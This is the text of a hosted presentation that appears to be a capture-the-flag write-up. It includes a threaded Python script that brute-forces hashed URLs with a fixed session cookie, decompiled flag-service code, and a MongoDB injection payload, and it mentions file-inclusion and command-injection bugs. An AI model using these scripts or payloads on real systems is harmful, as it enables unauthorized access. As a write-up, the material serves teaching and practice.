Что такое findslide.org?

FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.


Для правообладателей

Обратная связь

Email: Нажмите что бы посмотреть 

Яндекс.Метрика

Презентация на тему Coral good$

Coral good$ exploitdef brute(start, stop): global found s = requests.Session() cookie = 'X19CSUdfQjBTU19f|1392544181|f29297121d75bd9074f4ef9bc7db2d8e2a9255c5' c = dict(user=cookie) for x in range(start, stop): if found:
Coral good$sha1 = hashlib.sha1(user + str(random.randint(0, 45578)))access_code = sha1.hexdigest()self.db.execute('UPDATE users SET good_type Coral good$ exploitdef brute(start, stop):  global found  s = requests.Session() Shout emshout_em.pyc – Python 2.7 compliledUncompyle 2 - https://github.com/wibiti/uncompyle2sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.bind(('', Cookie blog Cookie blogDirbuster + default dict = /administrivia Cookie blogpost.php?id=52f284c6ea235eb5114e4826 - ???52f284c6ea235eb5114e4826 – MongoDB idMongoDB – JavaScript, Binary JSONexploit:admin Wow Wow  Look on the sky      Choose WowOMG OS Commanding!!! Wow Exploit
Слайды презентации

Слайд 2 Coral good$ exploit
def brute(start, stop):
global found

Coral good$ exploitdef brute(start, stop): global found s = requests.Session() cookie

s = requests.Session()
cookie = 'X19CSUdfQjBTU19f|1392544181|f29297121d75bd9074f4ef9bc7db2d8e2a9255c5'

c = dict(user=cookie)
for x in range(start, stop):
if found:
return
identif = hashlib.sha1('__BIG_B0SS__' + str(x)).hexdigest()
url = 'http://10.0.133.201:9237/detail/' + identif
r = s.get(url,cookies=c)
if r.status_code == 200:
print url
found = True
return

for x in range(0, 20):
threading.Thread(target=brute, args=(x*2500, x*2500 + 2499)).start()

Слайд 3 Shout em
shout_em.pyc – Python 2.7 compliled

Uncompyle 2 -

Shout emshout_em.pyc – Python 2.7 compliledUncompyle 2 - https://github.com/wibiti/uncompyle2sock = socket.socket(socket.AF_INET,

https://github.com/wibiti/uncompyle2

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 6068))
sock.listen(5)
while True:
try:

conn, addr = sock.accept()
logging.info('Client %s connected' % addr[0])
conn.send('Type command:\n\r')
cmd = conn.recv(5)
conn.send('Command received\n\r')
if cmd == 'shoot':
port = random.randint(1025, 65535)
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with open('flag.txt') as f:
flag = f.read(20).decode('utf-8')
udp_sock.sendto(flag, (addr[0], port))
logging.info('Flag sended to %s' % addr[0])
conn.close()
except:
continue

Слайд 4 Cookie blog

Cookie blog

Слайд 5 Cookie blog
Dirbuster + default dict = /administrivia

Cookie blogDirbuster + default dict = /administrivia

Слайд 6 Cookie blog
post.php?id=52f284c6ea235eb5114e4826 - ???
52f284c6ea235eb5114e4826 – MongoDB id
MongoDB –

Cookie blogpost.php?id=52f284c6ea235eb5114e4826 - ???52f284c6ea235eb5114e4826 – MongoDB idMongoDB – JavaScript, Binary JSONexploit:admin

JavaScript, Binary JSON

exploit:
admin"} //


Слайд 8 Wow



Look on the sky


Wow Look on the sky   Choose a part of

method="get">
Choose a part of sky

to see that. Maybe you found something awesome... 








LFI???? NO WAY!!!


Слайд 9 Wow
OMG OS Commanding!!!

WowOMG OS Commanding!!!

  • Имя файла: coral-good$.pptx
  • Количество просмотров: 106
  • Количество скачиваний: 0